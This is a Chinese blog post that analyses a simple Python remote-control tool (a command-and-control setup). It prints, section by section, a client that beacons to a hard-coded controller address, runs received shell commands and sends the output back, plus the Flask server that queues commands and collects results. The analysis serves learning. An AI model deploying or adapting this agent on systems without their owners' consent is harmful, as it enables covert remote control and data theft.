<!DOCTYPE html>
<html lang="zh-cn">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/wan1/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/wan1/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/wan1/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/wan1/images/logo.svg" color="#222">

<link rel="stylesheet" href="/wan1/css/main.css">


<link rel="stylesheet" href="/wan1/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"wanheiqiyihu.gitee.io","root":"/wan1/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="分析一款仅能执行命令的python远控github上找了一个python的简单远控来进行分析，从而了解其中的一些原理。 client端首先我们分析被控端的代码 太长我就不全部贴上来了，但会每一段都进行分析。 首先是主函数 1234if __name__ &#x3D;&#x3D; &quot;__main__&quot;:    print(&quot;[+] start client&quot;)    client">
<meta property="og:type" content="article">
<meta property="og:title" content="分析一款仅能执行命令的python远控">
<meta property="og:url" content="https://wanheiqiyihu.gitee.io/wan1/2022/11/13/%E5%88%86%E6%9E%90%E4%B8%80%E6%AC%BE%E4%BB%85%E8%83%BD%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E7%9A%84python%E8%BF%9C%E6%8E%A7/index.html">
<meta property="og:site_name" content="十三の博客">
<meta property="og:description" content="分析一款仅能执行命令的python远控github上找了一个python的简单远控来进行分析，从而了解其中的一些原理。 client端首先我们分析被控端的代码 太长我就不全部贴上来了，但会每一段都进行分析。 首先是主函数 1234if __name__ &#x3D;&#x3D; &quot;__main__&quot;:    print(&quot;[+] start client&quot;)    client">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2022/11/13/%E5%88%86%E6%9E%90%E4%B8%80%E6%AC%BE%E4%BB%85%E8%83%BD%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E7%9A%84python%E8%BF%9C%E6%8E%A7/image-20221113145948432.png">
<meta property="article:published_time" content="2022-11-13T07:16:54.000Z">
<meta property="article:modified_time" content="2022-11-13T07:17:54.000Z">
<meta property="article:author" content="十三">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wanheiqiyihu.gitee.io/wan1/wan1/2022/11/13/%E5%88%86%E6%9E%90%E4%B8%80%E6%AC%BE%E4%BB%85%E8%83%BD%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E7%9A%84python%E8%BF%9C%E6%8E%A7/image-20221113145948432.png">

<link rel="canonical" href="https://wanheiqiyihu.gitee.io/wan1/2022/11/13/%E5%88%86%E6%9E%90%E4%B8%80%E6%AC%BE%E4%BB%85%E8%83%BD%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E7%9A%84python%E8%BF%9C%E6%8E%A7/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-cn'
  };
</script>

  <title>分析一款仅能执行命令的python远控 | 十三の博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/wan1/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">十三の博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/wan1/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/wan1/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-ctf做题笔记">

    <a href="/wan1/categories/Experience" rel="section"><i class="download fa-fw"></i>CTF做题笔记</a>

  </li>
        <li class="menu-item menu-item-python">

    <a href="/wan1/categories/python" rel="section"><i class="download fa-fw"></i>python</a>

  </li>
        <li class="menu-item menu-item-java">

    <a href="/wan1/categories/java" rel="section"><i class="download fa-fw"></i>java</a>

  </li>
        <li class="menu-item menu-item-读书笔记">

    <a href="/wan1/categories/readbook" rel="section"><i class="download fa-fw"></i>读书笔记</a>

  </li>
        <li class="menu-item menu-item-渗透测试">

    <a href="/wan1/categories/penetration" rel="section"><i class="download fa-fw"></i>渗透测试</a>

  </li>
        <li class="menu-item menu-item-基础">

    <a href="/wan1/categories/basic" rel="section"><i class="download fa-fw"></i>基础</a>

  </li>
        <li class="menu-item menu-item-轮子">

    <a href="/wan1/categories/lunzi" rel="section"><i class="download fa-fw"></i>轮子</a>

  </li>
        <li class="menu-item menu-item-漏洞库">

    <a href="/wan1/categories/fuxian" rel="section"><i class="download fa-fw"></i>漏洞库</a>

  </li>
        <li class="menu-item menu-item-工具">

    <a href="/wan1/categories/tools" rel="section"><i class="download fa-fw"></i>工具</a>

  </li>
        <li class="menu-item menu-item-代码审计">

    <a href="/wan1/categories/daima" rel="section"><i class="download fa-fw"></i>代码审计</a>

  </li>
        <li class="menu-item menu-item-逆向">

    <a href="/wan1/categories/nixiang" rel="section"><i class="download fa-fw"></i>逆向</a>

  </li>
        <li class="menu-item menu-item-应急响应">

    <a href="/wan1/categories/yingji" rel="section"><i class="download fa-fw"></i>应急响应</a>

  </li>
        <li class="menu-item menu-item-免杀">

    <a href="/wan1/categories/miansha" rel="section"><i class="download fa-fw"></i>免杀</a>

  </li>
        <li class="menu-item menu-item-靶场">

    <a href="/wan1/categories/bachang" rel="section"><i class="download fa-fw"></i>靶场</a>

  </li>
        <li class="menu-item menu-item-cve申请">

    <a href="/wan1/categories/cve" rel="section"><i class="download fa-fw"></i>cve申请</a>

  </li>
        <li class="menu-item menu-item-c语言">

    <a href="/wan1/categories/c" rel="section"><i class="download fa-fw"></i>c语言</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-cn">
    <link itemprop="mainEntityOfPage" href="https://wanheiqiyihu.gitee.io/wan1/2022/11/13/%E5%88%86%E6%9E%90%E4%B8%80%E6%AC%BE%E4%BB%85%E8%83%BD%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E7%9A%84python%E8%BF%9C%E6%8E%A7/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/wan1/images/avatar.gif">
      <meta itemprop="name" content="十三">
      <meta itemprop="description" content="潜心学习，不骄不躁">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="十三の博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          分析一款仅能执行命令的python远控
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-11-13 15:16:54 / 修改时间：15:17:54" itemprop="dateCreated datePublished" datetime="2022-11-13T15:16:54+08:00">2022-11-13</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/wan1/categories/python/" itemprop="url" rel="index"><span itemprop="name">-python</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="分析一款仅能执行命令的python远控"><a href="#分析一款仅能执行命令的python远控" class="headerlink" title="分析一款仅能执行命令的python远控"></a>分析一款仅能执行命令的python远控</h1><p>github上找了一个python的简单远控来进行分析，从而了解其中的一些原理。</p>
<h1 id="client端"><a href="#client端" class="headerlink" title="client端"></a>client端</h1><p>首先我们分析被控端的代码</p>
<p>太长我就不全部贴上来了，但会每一段都进行分析。</p>
<p>首先是主函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] start client&quot;</span>)</span><br><span class="line">    client = Client()</span><br><span class="line">    client.run()</span><br></pre></td></tr></table></figure>

<p>新建了一个类Client，使用了run方法，跟踪一下看看。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Client</span>():</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span>(<span class="params">self</span>):</span></span><br><span class="line">        self.server_ip = <span class="string">&quot;192.168.100.1&quot;</span></span><br><span class="line">        self.server_port = <span class="string">&quot;5050&quot;</span></span><br><span class="line">        self.base_url = <span class="string">&quot;http://&quot;</span>+self.server_ip+<span class="string">&quot;:&quot;</span>+self.server_port</span><br><span class="line">        self.token = <span class="string">&quot;bkq98&quot;</span></span><br><span class="line">        self.init_name()</span><br><span class="line">        self.sleep_time = <span class="number">3</span></span><br><span class="line">        self.cmd_id = <span class="literal">None</span></span><br><span class="line">        self.result = <span class="string">&quot;&quot;</span></span><br></pre></td></tr></table></figure>

<p>首先定义了类的一些基本的参数，比如服务端ip端口等。</p>
<p>随后便是run()</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">run</span>(<span class="params">self</span>):</span></span><br><span class="line">    <span class="comment"># 心跳</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        self.heartbeat()</span><br><span class="line">        time.sleep(self.sleep_time)</span><br></pre></td></tr></table></figure>

<p>会不断的调用heartbeat()并且沉睡一段时间</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">heartbeat</span>(<span class="params">self</span>):</span></span><br><span class="line">    <span class="comment"># 有上次的执行结果就上传 没有就心跳 </span></span><br><span class="line">    <span class="comment"># server返回有命令且不是上一次的命令则 执行命令存储结果等待下一次心跳上传执行结果</span></span><br><span class="line">    url = self.base_url+<span class="string">&quot;/heartbeat/&quot;</span></span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">&quot;token&quot;</span>: self.token,</span><br><span class="line">        <span class="string">&quot;name&quot;</span>: self.name,</span><br><span class="line">        <span class="string">&quot;result&quot;</span>: self.result,</span><br><span class="line">        <span class="string">&quot;cmd_id&quot;</span>: self.cmd_id</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> self.result !=<span class="string">&quot;&quot;</span>:</span><br><span class="line">        data[<span class="string">&quot;result&quot;</span>] = self.result</span><br><span class="line">        self.result = <span class="string">&quot;&quot;</span></span><br><span class="line">        </span><br><span class="line">    response = self.send_data(url, data)</span><br><span class="line">    <span class="keyword">if</span> response==<span class="literal">None</span>:</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line">    <span class="comment"># 有命令需要执行并返回</span></span><br><span class="line">    <span class="keyword">if</span> response.status_code==<span class="number">200</span>:</span><br><span class="line">        server_data = json.loads(response.content)</span><br><span class="line">        cmd = server_data.get(<span class="string">&quot;cmd&quot;</span>, <span class="string">&quot;&quot;</span>)</span><br><span class="line">        cmd_id = server_data.get(<span class="string">&quot;cmd_id&quot;</span>, <span class="string">&quot;&quot;</span>)</span><br><span class="line">        <span class="keyword">if</span> cmd_id == self.cmd_id:</span><br><span class="line">            <span class="keyword">return</span></span><br><span class="line">        <span class="keyword">if</span> cmd:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;[+] cmd: &quot;</span>+cmd)</span><br><span class="line">            self.result = <span class="built_in">str</span>(self.<span class="built_in">exec</span>(cmd))</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;[*] result: &quot;</span>+self.result)</span><br><span class="line">            self.cmd_id = cmd_id</span><br></pre></td></tr></table></figure>

<p>首先是判断结果是否为空，如果为空则不作操作。</p>
<p>然后调用<code>send_data()</code>发送心跳包</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">send_data</span>(<span class="params">self, url, data</span>):</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        response = requests.post(url,json=data, timeout=<span class="number">10</span>)</span><br><span class="line">        <span class="keyword">return</span> response</span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[-] &quot;</span>+e)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span></span><br></pre></td></tr></table></figure>

<p>将定义好的data发送出去，并返回一个response。</p>
<p>按照作者给的注释，如果返回状态值为200并且没有报错，则是需要返回执行的命令的结果。</p>
<p>随后接受，服务端传过来的两个参数，cmd和cmd_id，验证cmd_id是否是自己的id，如果是的话则直接结束。</p>
<p>然后调用<code>self.exec()</code>来执行命令，我们下面看看</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">exec</span>(<span class="params">self, cmd</span>):</span></span><br><span class="line">    <span class="keyword">if</span> cmd.startswith(<span class="string">&quot;sleep&quot;</span>):</span><br><span class="line">        self.sleep_time = <span class="built_in">int</span>(cmd.split(<span class="string">&quot; &quot;</span>)[-<span class="number">1</span>])</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;time set ok&quot;</span></span><br><span class="line">    <span class="keyword">if</span> cmd.startswith(<span class="string">&quot;msf&quot;</span>):</span><br><span class="line">        <span class="comment">#TODO</span></span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;msf set ok&quot;</span></span><br><span class="line">    <span class="keyword">return</span> run_cmd(cmd)</span><br></pre></td></tr></table></figure>

<p>可以看出这里是一个功能检测，方便我们后期拓展。输入关键词就可以执行响应的操作，如果是sleep。则将自己的心跳时间修改为cmd最后一个参数。如果是msf，就写入联动msf的代码就好了，这里作者还没做好。</p>
<p>如果是正常的执行命令则，调用run_cmd函数。这里我们跟如run_cmd函数。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">run_cmd</span>(<span class="params">cmd</span>):</span></span><br><span class="line">    p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=<span class="literal">True</span>, close_fds=<span class="literal">True</span>,</span><br><span class="line">                         start_new_session=<span class="literal">True</span>)</span><br><span class="line">    formats = <span class="string">&#x27;gbk&#x27;</span> <span class="keyword">if</span> platform.system() == <span class="string">&quot;Windows&quot;</span> <span class="keyword">else</span> <span class="string">&#x27;utf-8&#x27;</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        result = p.stdout.read()</span><br><span class="line">        p.wait()</span><br><span class="line">        <span class="keyword">return</span> result.decode(formats)</span><br><span class="line">    <span class="keyword">except</span> :</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;命令执行错误&quot;</span></span><br></pre></td></tr></table></figure>

<p>这里改成了一个子线程，根据系统来进行返回值的编码，然后执行第一个cmd，由于设置了shell=True,那我们的命令是可以带空格执行的。</p>
<p>随后就是return命令执行结果，并且wait线程。</p>
<p>接着看上面heartbeat()最后一步</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> cmd:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;[+] cmd: &quot;</span>+cmd)</span><br><span class="line">                self.result = <span class="built_in">str</span>(self.<span class="built_in">exec</span>(cmd))</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;[*] result: &quot;</span>+self.result)</span><br><span class="line">                self.cmd_id = cmd_id</span><br></pre></td></tr></table></figure>

<p>将self.result赋值成结果然后self.cmd_id赋值成cmd_id，这个cmd_id就是心跳检测的关键，在sleep了设定的数值之后，如果cmd_id，那么就不会返回新的结果，除非有新的cmd_id出现，否则不会执行任何命令。</p>
<p>随后执行完命令之后继续沉睡指定时间，然后继续while循环</p>
<p>最后就是有一个检测，如果用户输入ctrl+c,那么就会停止这个脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ctrl_c</span>(<span class="params">signum,frame</span>):</span></span><br><span class="line">    <span class="built_in">print</span>()</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[-] input ctrl c&quot;</span>)</span><br><span class="line">    sys.exit()</span><br><span class="line"></span><br><span class="line">signal.signal(signal.SIGINT, ctrl_c)</span><br></pre></td></tr></table></figure>

<h1 id="web端（控制端）"><a href="#web端（控制端）" class="headerlink" title="web端（控制端）"></a>web端（控制端）</h1><p>简单看了下，基于flask框架开发的。</p>
<p><img src="/wan1/wan1/2022/11/13/%E5%88%86%E6%9E%90%E4%B8%80%E6%AC%BE%E4%BB%85%E8%83%BD%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E7%9A%84python%E8%BF%9C%E6%8E%A7/image-20221113145948432.png" alt="image-20221113145948432"></p>
<p>主代码:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> app <span class="keyword">import</span> app</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(<span class="string">&quot;192.168.100.1&quot;</span>, <span class="number">5050</span>, debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p>定义你的服务器ip和访问的端口，不过这个没有密码，后续要使用的话，可以加入一些响应的鉴权措施。</p>
<p>router.py路由：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/&quot;</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span>():</span></span><br><span class="line">    client_list = Clients.query.order_by(Clients.update_time).<span class="built_in">all</span>()</span><br><span class="line">    <span class="keyword">return</span> render_template(</span><br><span class="line">        <span class="string">&quot;index.html&quot;</span>, clients = client_list)</span><br></pre></td></tr></table></figure>

<p>做了个跳转，跳转到index.html页面</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/heartbeat/&quot;</span>, methods=[<span class="string">&quot;POST&quot;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">heartbeat</span>():</span></span><br><span class="line">    data = request.get_json()</span><br><span class="line">    <span class="built_in">print</span>(data)</span><br><span class="line">    token = data.get(<span class="string">&quot;token&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> token !=<span class="string">&quot;bkq98&quot;</span>:</span><br><span class="line">        <span class="keyword">return</span> jsonify(&#123;&#125;)</span><br><span class="line">    <span class="comment"># 先判断是否需要注册client</span></span><br><span class="line">    name = data.get(<span class="string">&quot;name&quot;</span>)</span><br><span class="line">    ip = request.remote_addr</span><br><span class="line">    client_result = data.get(<span class="string">&quot;result&quot;</span>)</span><br><span class="line">    client_cmd_id = data.get(<span class="string">&quot;cmd_id&quot;</span>)</span><br><span class="line">    db_client = Clients.query.<span class="built_in">filter</span>(Clients.name==name, Clients.ip==ip).first()</span><br><span class="line">    <span class="keyword">if</span> db_client:</span><br><span class="line">        db_client.update_time = datetime.datetime.now()</span><br><span class="line">        db.session.commit()</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        client = Clients()</span><br><span class="line">        client.name = name</span><br><span class="line">        client.ip = ip</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            db.session.add(client)</span><br><span class="line">            db.session.commit()</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="built_in">print</span>(e)</span><br><span class="line">    <span class="keyword">if</span> client_result:</span><br><span class="line">        <span class="comment"># 上次结果</span></span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[+] client: &quot;</span>+name+<span class="string">&quot; ip: &quot;</span>+ip+<span class="string">&quot; upload result: &quot;</span>+ client_result)</span><br><span class="line">        db_echo_result = EchoResult.query.<span class="built_in">filter</span>(EchoResult.<span class="built_in">id</span>==client_cmd_id).first()</span><br><span class="line">        db_echo_result.result = client_result</span><br><span class="line">        db.session.commit()</span><br><span class="line">    <span class="comment"># 获取是否有需要执行的命令</span></span><br><span class="line">    db_echo_result = EchoResult.query.<span class="built_in">filter</span>(EchoResult.client_name==name,EchoResult.ip==ip,EchoResult.result==<span class="literal">None</span>).first()</span><br><span class="line">    <span class="keyword">if</span> db_echo_result:</span><br><span class="line">        cmd_id = db_echo_result.<span class="built_in">id</span></span><br><span class="line">        cmd = db_echo_result.cmd</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;[+] server issued cmd:&quot;</span>+cmd+<span class="string">&quot; name: &quot;</span> +name+<span class="string">&quot; ip: &quot;</span>+ip)</span><br><span class="line">        <span class="keyword">return</span> jsonify(&#123;<span class="string">&quot;cmd_id&quot;</span>:cmd_id, <span class="string">&quot;cmd&quot;</span>:cmd&#125;)</span><br><span class="line">    <span class="keyword">return</span> jsonify(&#123;&#125;)</span><br></pre></td></tr></table></figure>

<p>这个路由就是client端心跳包请求的地址</p>
<p>首先会将心跳包传的参数存储到data变量中，随后会校检一下其中的token是否是我们设置的token，</p>
<p>随后就是一系列的提取数据</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">name = data.get(<span class="string">&quot;name&quot;</span>)</span><br><span class="line">ip = request.remote_addr</span><br><span class="line">client_result = data.get(<span class="string">&quot;result&quot;</span>)</span><br><span class="line">client_cmd_id = data.get(<span class="string">&quot;cmd_id&quot;</span>)</span><br><span class="line">db_client = Clients.query.<span class="built_in">filter</span>(Clients.name==name, Clients.ip==ip).first()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> db_client:</span><br><span class="line">    db_client.update_time = datetime.datetime.now()</span><br><span class="line">    db.session.commit()</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    client = Clients()</span><br><span class="line">    client.name = name</span><br><span class="line">    client.ip = ip</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        db.session.add(client)</span><br><span class="line">        db.session.commit()</span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(e)</span><br></pre></td></tr></table></figure>

<p>然后就是检测是否是数据库中已有的用户，如果是的话，就更新数据库的时间，如果不是，就添加一个用户。</p>
